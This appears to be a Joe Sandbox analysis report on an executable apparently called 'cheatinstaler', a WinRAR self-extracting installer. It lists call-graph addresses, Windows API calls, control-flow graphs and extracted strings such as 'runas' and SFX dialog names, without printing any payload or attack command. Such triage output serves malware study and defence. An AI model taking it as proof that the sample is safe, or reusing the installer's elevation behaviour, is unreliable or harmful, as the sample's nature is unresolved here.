28537->28540 28538->28542 28539 7ff6c16b1fa0 31 API calls 28543 7ff6c16e0b93 SetEnvironmentVariableW GetLocalTime 28539->28543 28724 7ff6c16dcad0 28540->28724 28542->28539 28546 7ff6c16c3e28 swprintf 46 API calls 28543->28546 28544 7ff6c16e1900 _com_raise_error 14 API calls 28544->28547 28545 7ff6c16e09af 28545->28532 28549 7ff6c16e0adb 28545->28549 28550 7ff6c16e09f9 OpenFileMappingW 28545->28550 28548 7ff6c16e0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28546->28548 28547->28544 28756 7ff6c16db014 LoadBitmapW 28548->28756 28558 7ff6c16b129c 33 API calls 28549->28558 28552 7ff6c16e0ad0 CloseHandle 28550->28552 28553 7ff6c16e0a19 MapViewOfFile 28550->28553 28552->28571 28553->28552 28556 7ff6c16e0a3f UnmapViewOfFile MapViewOfFile 28553->28556 28556->28552 28559 7ff6c16e0a71 28556->28559 28557 7ff6c16e0c75 28780 7ff6c16d67b4 28557->28780 28561 7ff6c16e0b00 28558->28561 28787 7ff6c16da190 33 API calls 2 library calls 28559->28787 28743 7ff6c16dfd0c 28561->28743 28565 7ff6c16e0a81 28568 7ff6c16dfd0c 35 API calls 28565->28568 28566 7ff6c16d67b4 33 API calls 28569 7ff6c16e0c87 DialogBoxParamW 28566->28569 28570 7ff6c16e0a90 28568->28570 28579 7ff6c16e0cd3 28569->28579 28788 7ff6c16cb9b4 102 API calls 28570->28788 28571->28533 28573 7ff6c16e0aa5 28789 7ff6c16cbb00 102 API calls 28573->28789 28574 7ff6c16e0dd7 28576 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28574->28576 28576->28578 28577 7ff6c16e0ab8 28582 7ff6c16e0ac7 UnmapViewOfFile 28577->28582 28578->28531 28580 7ff6c16e0cec 28579->28580 28581 7ff6c16e0ce6 Sleep 28579->28581 28583 7ff6c16e0cfa 28580->28583 28790 7ff6c16d9f4c 49 API calls 2 library calls 28580->28790 28581->28580 28582->28552 28585 7ff6c16e0d06 DeleteObject 28583->28585 28586 7ff6c16e0d25 28585->28586 28587 7ff6c16e0d1f DeleteObject 28585->28587 28588 7ff6c16e0d5b 28586->28588 28589 7ff6c16e0d6d 28586->28589 28587->28586 28791 7ff6c16dfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28588->28791 28783 7ff6c16d94e4 28589->28783 28592 7ff6c16e0d60 CloseHandle 28592->28589 28596->28488 28599->28482 28600->28486 28602 7ff6c16e281e __scrt_dllmain_crt_thread_attach 28601->28602 28602->28504 28602->28508 28604 7ff6c16f0d4c 28603->28604 28605 7ff6c16e2830 28604->28605 28608 7ff6c16eec00 28604->28608 28605->28508 28607 7ff6c16e51a0 7 API calls 2 library calls 28605->28607 28607->28508 28619 7ff6c16ef398 EnterCriticalSection 28608->28619 28621 7ff6c16b91c8 35 API calls 28620->28621 28622 7ff6c16b1130 28621->28622 28625 7ff6c16e29bc 34 API calls 28622->28625 28624 7ff6c16e2a01 28624->28510 28625->28624 28627 7ff6c16f0749 28626->28627 28628 7ff6c16f073d 28626->28628 28627->28518 28631 7ff6c16f0570 48 API calls 5 library calls 28628->28631 28630->28518 28631->28627 28792 7ff6c16e2450 28632->28792 28635 7ff6c16ce07b 28639 7ff6c16ce503 28635->28639 28799 7ff6c16eb788 39 API calls _snwprintf 28635->28799 28636 7ff6c16ce026 GetProcAddress 28637 7ff6c16ce053 GetProcAddress 28636->28637 28638 7ff6c16ce03b 28636->28638 28637->28635 28641 7ff6c16ce068 28637->28641 28638->28637 28640 7ff6c16c6454 34 API calls 28639->28640 28643 7ff6c16ce50c 28640->28643 28641->28635 28645 7ff6c16c7df4 47 API calls 28643->28645 28644 7ff6c16ce3b0 28644->28639 28646 7ff6c16ce3ba 28644->28646 28676 7ff6c16ce51a 28645->28676 28647 7ff6c16c6454 34 API calls 28646->28647 28648 7ff6c16ce3c3 CreateFileW 28647->28648 28649 7ff6c16ce403 SetFilePointer 28648->28649 28650 7ff6c16ce4f0 CloseHandle 28648->28650 28649->28650 28652 7ff6c16ce41c ReadFile 28649->28652 28653 7ff6c16b1fa0 31 API calls 28650->28653 28652->28650 28654 7ff6c16ce444 28652->28654 28653->28639 28655 7ff6c16ce800 28654->28655 28656 7ff6c16ce458 28654->28656 28808 7ff6c16e2624 8 API calls 28655->28808 28661 7ff6c16b129c 33 API calls 28656->28661 28658 7ff6c16ce53e CompareStringW 28658->28676 28659 7ff6c16b129c 33 API calls 28659->28676 28660 7ff6c16ce805 28668 7ff6c16ce48f 28661->28668 28662 7ff6c16c8090 47 API calls 28662->28676 28663 7ff6c16ce63a 28666 7ff6c16ce7c2 28663->28666 28667 7ff6c16ce648 28663->28667 28664 7ff6c16b1fa0 31 API calls 28664->28676 28670 7ff6c16b1fa0 31 API calls 28666->28670 28804 7ff6c16c7eb0 47 API calls 28667->28804 28672 7ff6c16ce4db 28668->28672 28800 7ff6c16cd0a0 28668->28800 28675 7ff6c16ce7cb 28670->28675 28671 7ff6c16c32bc 51 API calls 28671->28676 28673 7ff6c16b1fa0 31 API calls 28672->28673 28677 7ff6c16ce4e5 28673->28677 28674 7ff6c16ce651 28678 7ff6c16c51a4 9 API calls 28674->28678 28680 7ff6c16b1fa0 31 API calls 28675->28680 28676->28658 28676->28659 28676->28662 28676->28664 28676->28671 28694 7ff6c16ce5cc 28676->28694 28794 7ff6c16c51a4 28676->28794 28681 7ff6c16b1fa0 31 API calls 28677->28681 28682 7ff6c16ce656 28678->28682 28679 7ff6c16b129c 33 API calls 28679->28694 28683 7ff6c16ce7d5 28680->28683 28681->28650 28684 7ff6c16ce706 28682->28684 28691 7ff6c16ce661 28682->28691 28686 7ff6c16e2320 _handle_error 8 API calls 28683->28686 28687 7ff6c16cda98 48 API calls 28684->28687 28685 7ff6c16c8090 47 API calls 28685->28694 28688 7ff6c16ce7e4 28686->28688 28689 7ff6c16ce74b AllocConsole 28687->28689 28688->28524 28692 7ff6c16ce755 GetCurrentProcessId AttachConsole 28689->28692 28693 7ff6c16ce6fb 28689->28693 28690 7ff6c16b1fa0 31 API calls 28690->28694 28698 7ff6c16caae0 48 API calls 28691->28698 28695 7ff6c16ce76c 28692->28695 28807 7ff6c16b19e0 31 API calls _invalid_parameter_noinfo_noreturn 28693->28807 28694->28663 28694->28679 28694->28685 28694->28690 28696 7ff6c16c32bc 51 API calls 28694->28696 28702 7ff6c16ce778 GetStdHandle WriteConsoleW Sleep FreeConsole 28695->28702 28696->28694 28700 7ff6c16ce6a5 28698->28700 28699 7ff6c16ce7b9 ExitProcess 28701 7ff6c16cda98 48 API calls 28700->28701 28703 7ff6c16ce6c3 28701->28703 28702->28693 28704 7ff6c16caae0 48 API calls 28703->28704 28705 7ff6c16ce6ce 28704->28705 28805 7ff6c16cdc2c 33 API calls 28705->28805 28707 7ff6c16ce6da 28806 7ff6c16b19e0 31 API calls _invalid_parameter_noinfo_noreturn 28707->28806 28710 7ff6c16cdd88 28709->28710 28711 7ff6c16d9481 OleInitialize 28710->28711 28712 7ff6c16d94a7 28711->28712 28713 7ff6c16d94cd SHGetMalloc 28712->28713 28713->28527 28715 7ff6c16d9a49 28714->28715 28717 7ff6c16d9a4e memcpy_s 28714->28717 28716 7ff6c16b1fa0 31 API calls 28715->28716 28716->28717 28718 7ff6c16b1fa0 31 API calls 28717->28718 28723 7ff6c16d9a7d memcpy_s 28717->28723 28718->28723 28719 7ff6c16b1fa0 31 API calls 28720 7ff6c16d9aac memcpy_s 28719->28720 28721 7ff6c16b1fa0 31 API calls 28720->28721 28722 7ff6c16d9adb memcpy_s 28720->28722 28721->28722 28722->28529 28723->28719 28723->28720 28725 7ff6c16cd0a0 33 API calls 28724->28725 28739 7ff6c16dcb1f memcpy_s 28725->28739 28726 7ff6c16dcd8b 28727 7ff6c16dcdbe 28726->28727 28731 7ff6c16dcde4 28726->28731 28728 7ff6c16e2320 _handle_error 8 API calls 28727->28728 28732 7ff6c16dcdcf 28728->28732 28729 7ff6c16cd0a0 33 API calls 28729->28739 28730 7ff6c16d13b8 CharUpperW 28730->28739 28733 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28731->28733 28732->28545 28734 7ff6c16dcde9 28733->28734 28810 7ff6c16b704c 47 API calls memcpy_s 28734->28810 28735 7ff6c16dcdef 28811 7ff6c16b704c 47 API calls memcpy_s 28735->28811 28738 7ff6c16dcdf5 28739->28726 28739->28729 28739->28730 28739->28731 28739->28734 28739->28735 28741 7ff6c16b1fa0 31 API calls 28739->28741 28742 7ff6c16b129c 33 API calls 28739->28742 28809 7ff6c16cbb00 102 API calls 28739->28809 28741->28739 28742->28739 28744 7ff6c16dfd3c SetEnvironmentVariableW 28743->28744 28745 7ff6c16dfd39 28743->28745 28746 7ff6c16cd0a0 33 API calls 28744->28746 28745->28744 28753 7ff6c16dfd74 28746->28753 28747 7ff6c16dfdc3 28748 7ff6c16dfdfa 28747->28748 28751 7ff6c16dfe1b 28747->28751 28749 7ff6c16e2320 _handle_error 8 API calls 28748->28749 28750 7ff6c16dfe0b 28749->28750 28750->28571 28750->28574 28752 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28751->28752 28754 7ff6c16dfe20 28752->28754 28753->28747 28755 7ff6c16dfdad SetEnvironmentVariableW 28753->28755 28755->28747 28757 7ff6c16db03e 28756->28757 28758 7ff6c16db046 28756->28758 28812 7ff6c16d8624 FindResourceW 28757->28812 28760 7ff6c16db063 28758->28760 28761 7ff6c16db04e GetObjectW 28758->28761 28762 7ff6c16d849c 4 API calls 28760->28762 28761->28760 28764 7ff6c16db078 28762->28764 28763 7ff6c16db0ce 28775 7ff6c16c98ac 28763->28775 28764->28763 28765 7ff6c16db09e 28764->28765 28766 7ff6c16d8624 10 API calls 28764->28766 28826 7ff6c16d8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28765->28826 28769 7ff6c16db08a 28766->28769 28768 7ff6c16db0a7 28770 7ff6c16d84cc 4 API calls 28768->28770 28769->28765 28771 7ff6c16db092 DeleteObject 28769->28771 28772 7ff6c16db0b2 28770->28772 28771->28765 28827 7ff6c16d8df4 16 API calls _handle_error 28772->28827 28774 7ff6c16db0bf DeleteObject 28774->28763 28828 7ff6c16c98dc 28775->28828 28777 7ff6c16c98ba 28895 7ff6c16ca43c GetModuleHandleW FindResourceW 28777->28895 28779 7ff6c16c98c2 28779->28557 28781 7ff6c16e21d0 33 API calls 28780->28781 28782 7ff6c16d67fa 28781->28782 28782->28566 28784 7ff6c16d9501 28783->28784 28785 7ff6c16d950a OleUninitialize 28784->28785 28786 7ff6c171e330 28785->28786 28787->28565 28788->28573 28789->28577 28790->28583 28791->28592 28793 7ff6c16cdff4 GetModuleHandleW 28792->28793 28793->28635 28793->28636 28795 7ff6c16c51c8 GetVersionExW 28794->28795 28796 7ff6c16c51fb 28794->28796 28795->28796 28797 7ff6c16e2320 _handle_error 8 API calls 28796->28797 28798 7ff6c16c5228 28797->28798 28798->28676 28799->28644 28802 7ff6c16cd0d2 28800->28802 28801 7ff6c16cd106 28801->28668 28802->28801 28803 7ff6c16b1744 33 API calls 28802->28803 28803->28802 28804->28674 28805->28707 28806->28693 28807->28699 28808->28660 28809->28739 28810->28735 28811->28738 28813 7ff6c16d879b 28812->28813 28814 7ff6c16d864f SizeofResource 28812->28814 28813->28758 28814->28813 28815 7ff6c16d8669 LoadResource 28814->28815 28815->28813 28816 7ff6c16d8682 LockResource 28815->28816 28816->28813 28817 7ff6c16d8697 GlobalAlloc 28816->28817 28817->28813 28818 7ff6c16d86b8 GlobalLock 28817->28818 28819 7ff6c16d8792 GlobalFree 28818->28819 28820 7ff6c16d86ca memcpy_s 28818->28820 28819->28813 28821 7ff6c16d86f6 GdipAlloc 28820->28821 28822 7ff6c16d8789 GlobalUnlock 28820->28822 28823 7ff6c16d870b 28821->28823 28822->28819 28823->28822 28824 7ff6c16d8772 28823->28824 28825 7ff6c16d875a GdipCreateHBITMAPFromBitmap 28823->28825 28824->28822 28825->28824 28826->28768 28827->28774 28831 7ff6c16c98fe _snwprintf 28828->28831 28829 7ff6c16c9973 28905 7ff6c16c68b0 48 API calls 28829->28905 28831->28829 28835 7ff6c16c9a89 28831->28835 28832 7ff6c16c997d memcpy_s 28833 7ff6c16b1fa0 31 API calls 28832->28833 28892 7ff6c16ca42e 28832->28892 28834 7ff6c16c99fd 28833->28834 28839 7ff6c16c24c0 54 API calls 28834->28839 28835->28834 28837 7ff6c16b20b0 33 API calls 28835->28837 28836 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28838 7ff6c16ca434 28836->28838 28837->28834 28841 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 28838->28841 28840 7ff6c16c9a1a 28839->28840 28842 7ff6c16c9a22 28840->28842 28849 7ff6c16c9aad 28840->28849 28843 7ff6c16ca43a 28841->28843 28844 7ff6c16c204c 100 API calls 28842->28844 28846 7ff6c16c9a2b 28844->28846 28845 7ff6c16c9b17 28897 7ff6c16ea450 28845->28897 28846->28838 28848 7ff6c16c9a66 28846->28848 28852 7ff6c16e2320 _handle_error 8 API calls 28848->28852 28849->28845 28853 7ff6c16c8e58 33 API calls 28849->28853 28851 7ff6c16ea450 31 API calls 28865 7ff6c16c9b57 __vcrt_FlsAlloc 28851->28865 28854 7ff6c16ca40e 28852->28854 28853->28849 28854->28777 28855 7ff6c16c9c89 28856 7ff6c16c2aa0 101 API calls 28855->28856 28868 7ff6c16c9d5c 28855->28868 28859 7ff6c16c9ca1 28856->28859 28857 7ff6c16c2bb0 101 API calls 28857->28865 28858 7ff6c16c28d0 104 API calls 28858->28865 28860 7ff6c16c28d0 104 API calls 28859->28860 28859->28868 28866 7ff6c16c9cc9 28860->28866 28861 7ff6c16c204c 100 API calls 28863 7ff6c16ca3f5 28861->28863 28862 7ff6c16c2aa0 101 API calls 28862->28865 28864 7ff6c16b1fa0 31 API calls 28863->28864 28864->28848 28865->28855 28865->28857 28865->28858 28865->28862 28865->28868 28866->28868 28888 7ff6c16c9cd7 __vcrt_FlsAlloc 28866->28888 28906 7ff6c16d0bbc MultiByteToWideChar 28866->28906 28868->28861 28869 7ff6c16ca1ec 28885 7ff6c16ca2c2 28869->28885 28912 7ff6c16ecf90 31 API calls 2 library calls 28869->28912 28871 7ff6c16ca157 28871->28869 28909 7ff6c16ecf90 31 API calls 2 library calls 28871->28909 28872 7ff6c16ca14b 28872->28777 28875 7ff6c16ca2ae 28875->28885 28914 7ff6c16c8cd0 33 API calls 2 library calls 28875->28914 28876 7ff6c16ca249 28913 7ff6c16eb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28876->28913 28877 7ff6c16ca3a2 28878 7ff6c16ea450 31 API calls 28877->28878 28880 7ff6c16ca3cb 28878->28880 28883 7ff6c16ea450 31 API calls 28880->28883 28881 7ff6c16c8e58 33 API calls 28881->28885 28882 7ff6c16ca16d 28910 7ff6c16eb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28882->28910 28883->28868 28885->28877 28885->28881 28886 7ff6c16ca1d8 28886->28869 28911 7ff6c16c8cd0 33 API calls 2 library calls 28886->28911 28888->28868 28888->28869 28888->28871 28888->28872 28889 7ff6c16ca429 28888->28889 28890 7ff6c16d0f68 WideCharToMultiByte 28888->28890 28907 7ff6c16caa88 45 API calls _snwprintf 28888->28907 28908 7ff6c16ea270 31 API calls 2 library calls 28888->28908 28915 7ff6c16e2624 8 API calls 28889->28915 28890->28888 28892->28836 28896 7ff6c16ca468 28895->28896 28896->28779 28898 7ff6c16ea47d 28897->28898 28904 7ff6c16ea492 28898->28904 28916 7ff6c16ed69c 15 API calls abort 28898->28916 28900 7ff6c16ea487 28917 7ff6c16e78e4 31 API calls _invalid_parameter_noinfo 28900->28917 28902 7ff6c16e2320 _handle_error 8 API calls 28903 7ff6c16c9b37 28902->28903 28903->28851 28904->28902 28905->28832 28906->28888 28907->28888 28908->28888 28909->28882 28910->28886 28911->28869 28912->28876 28913->28875 28914->28885 28915->28892 28916->28900 28917->28904

                                                                                                  Executed Functions

                                                                                                  Function 00007FF6C16DB190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                  • API String ID: 3303814210-2702805183
                                                                                                  • Opcode ID: 937210c2e510caa8de60326d0bf769a59ef258c76f9eb9a3915c043d96f2bb73
                                                                                                  • Instruction ID: b8c5a99de3e7be0c8efc76c9656348629b70b6803dd51c0141a6a82b96ba65ac
                                                                                                  • Opcode Fuzzy Hash: 937210c2e510caa8de60326d0bf769a59ef258c76f9eb9a3915c043d96f2bb73
                                                                                                  • Instruction Fuzzy Hash: B3D2A462A0878641EB20EF27E8542F96361FF86786F604135D9CD877AADF3CE644E740
                                                                                                  Function 00007FF6C16DCE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                  • API String ID: 1830998149-3916287355
                                                                                                  • Opcode ID: 7f7cf621285890d289b7a5689e1f5a4e564ca718d967f11b89b90c9b9141b20d
                                                                                                  • Instruction ID: ad32ea0407e7ef0f3fd6ca8b539a5bec247c4be529634ad2d4072cc2da942b53
                                                                                                  • Opcode Fuzzy Hash: 7f7cf621285890d289b7a5689e1f5a4e564ca718d967f11b89b90c9b9141b20d
                                                                                                  • Instruction Fuzzy Hash: 9D13CF72B04B8299EB10EF66D8402EC27B1FB4139AF604135DADD97AD9DF38E585E340
                                                                                                  Function 00007FF6C16E0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1466 7ff6c16e0754-7ff6c16e0829 call 7ff6c16cdfd0 call 7ff6c16c62dc call 7ff6c16d946c call 7ff6c16e3cf0 call 7ff6c16d9a14 1477 7ff6c16e0860-7ff6c16e0883 1466->1477 1478 7ff6c16e082b-7ff6c16e0840 1466->1478 1481 7ff6c16e0885-7ff6c16e089a 1477->1481 1482 7ff6c16e08ba-7ff6c16e08dd 1477->1482 1479 7ff6c16e0842-7ff6c16e0855 1478->1479 1480 7ff6c16e085b call 7ff6c16e220c 1478->1480 1479->1480 1485 7ff6c16e0ddd-7ff6c16e0de2 call 7ff6c16e7904 1479->1485 1480->1477 1487 7ff6c16e08b5 call 7ff6c16e220c 1481->1487 1488 7ff6c16e089c-7ff6c16e08af 1481->1488 1483 7ff6c16e0914-7ff6c16e0937 1482->1483 1484 7ff6c16e08df-7ff6c16e08f4 1482->1484 1491 7ff6c16e096e-7ff6c16e097a GetCommandLineW 1483->1491 1492 7ff6c16e0939-7ff6c16e094e 1483->1492 1489 7ff6c16e090f call 7ff6c16e220c 1484->1489 1490 7ff6c16e08f6-7ff6c16e0909 1484->1490 1503 7ff6c16e0de3-7ff6c16e0df0 call 7ff6c16e7904 1485->1503 1487->1482 1488->1485 1488->1487 1489->1483 1490->1485 1490->1489 1499 7ff6c16e0980-7ff6c16e09b7 call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16dcad0 1491->1499 1500 7ff6c16e0b47-7ff6c16e0b5e call 7ff6c16c6454 1491->1500 1496 7ff6c16e0950-7ff6c16e0963 1492->1496 1497 7ff6c16e0969 call 7ff6c16e220c 1492->1497 1496->1485 1496->1497 1497->1491 1524 7ff6c16e09ec-7ff6c16e09f3 1499->1524 1525 7ff6c16e09b9-7ff6c16e09cc 1499->1525 1508 7ff6c16e0b60-7ff6c16e0b85 call 7ff6c16b1fa0 call 7ff6c16e3640 1500->1508 1509 7ff6c16e0b89-7ff6c16e0ce4 call 7ff6c16b1fa0 SetEnvironmentVariableW GetLocalTime call 7ff6c16c3e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6c16db014 call 7ff6c16c98ac call 7ff6c16d67b4 * 2 DialogBoxParamW call 7ff6c16d68a8 * 2 1500->1509 1514 7ff6c16e0df5-7ff6c16e0e2f call 7ff6c16e1900 1503->1514 1508->1509 1573 7ff6c16e0cec-7ff6c16e0cf3 1509->1573 1574 7ff6c16e0ce6 Sleep 1509->1574 1523 7ff6c16e0e34-7ff6c16e0eb1 1514->1523 1523->1514 1531 7ff6c16e0adb-7ff6c16e0b05 call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16dfd0c 1524->1531 1532 7ff6c16e09f9-7ff6c16e0a13 OpenFileMappingW 1524->1532 1529 7ff6c16e09ce-7ff6c16e09e1 1525->1529 1530 7ff6c16e09e7 call 7ff6c16e220c 1525->1530 1529->1503 1529->1530 1530->1524 1553 7ff6c16e0b0a-7ff6c16e0b12 1531->1553 1537 7ff6c16e0ad0-7ff6c16e0ad9 CloseHandle 1532->1537 1538 7ff6c16e0a19-7ff6c16e0a39 MapViewOfFile 1532->1538 1537->1500 1538->1537 1542 7ff6c16e0a3f-7ff6c16e0a6f UnmapViewOfFile MapViewOfFile 1538->1542 1542->1537 1545 7ff6c16e0a71-7ff6c16e0aca call 7ff6c16da190 call 7ff6c16dfd0c call 7ff6c16cb9b4 call 7ff6c16cbb00 call 7ff6c16cbb70 UnmapViewOfFile 1542->1545 1545->1537 1553->1500 1556 7ff6c16e0b14-7ff6c16e0b27 1553->1556 1559 7ff6c16e0b42 call 7ff6c16e220c 1556->1559 1560 7ff6c16e0b29-7ff6c16e0b3c 1556->1560 1559->1500 1560->1559 1565 7ff6c16e0dd7-7ff6c16e0ddc call 7ff6c16e7904 1560->1565 1565->1485 1576 7ff6c16e0cf5 call 7ff6c16d9f4c 1573->1576 1577 7ff6c16e0cfa-7ff6c16e0d1d call 7ff6c16cb8e0 DeleteObject 1573->1577 1574->1573 1576->1577 1581 7ff6c16e0d25-7ff6c16e0d2c 1577->1581 1582 7ff6c16e0d1f DeleteObject 1577->1582 1583 7ff6c16e0d2e-7ff6c16e0d35 1581->1583 1584 7ff6c16e0d48-7ff6c16e0d59 1581->1584 1582->1581 1583->1584 1585 7ff6c16e0d37-7ff6c16e0d43 call 7ff6c16bba0c 1583->1585 1586 7ff6c16e0d5b-7ff6c16e0d67 call 7ff6c16dfe24 CloseHandle 1584->1586 1587 7ff6c16e0d6d-7ff6c16e0d7a 1584->1587 1585->1584 1586->1587 1590 7ff6c16e0d9f-7ff6c16e0da4 call 7ff6c16d94e4 1587->1590 1591 7ff6c16e0d7c-7ff6c16e0d89 1587->1591 1596 7ff6c16e0da9-7ff6c16e0dd6 call 7ff6c16e2320 1590->1596 1594 7ff6c16e0d8b-7ff6c16e0d93 1591->1594 1595 7ff6c16e0d99-7ff6c16e0d9b 1591->1595 1594->1590 1597 7ff6c16e0d95-7ff6c16e0d97 1594->1597 1595->1590 1598 7ff6c16e0d9d 1595->1598 1597->1590 1598->1590
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                  • API String ID: 1048086575-3710569615
                                                                                                  • Opcode ID: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
                                                                                                  • Instruction ID: 7737979ea7f472a1aa3fc29db5687d501243a2d2bf5778ee231d32b46211a27d
                                                                                                  • Opcode Fuzzy Hash: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
                                                                                                  • Instruction Fuzzy Hash: 4312A521B18B8285EB10DF26EC552B96361FF85786F504231DADD87BA6DF3CE240E740
                                                                                                  Function 00007FF6C16CA4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                                  • String ID: $%s:$CAPTION
                                                                                                  • API String ID: 1936833115-404845831
                                                                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
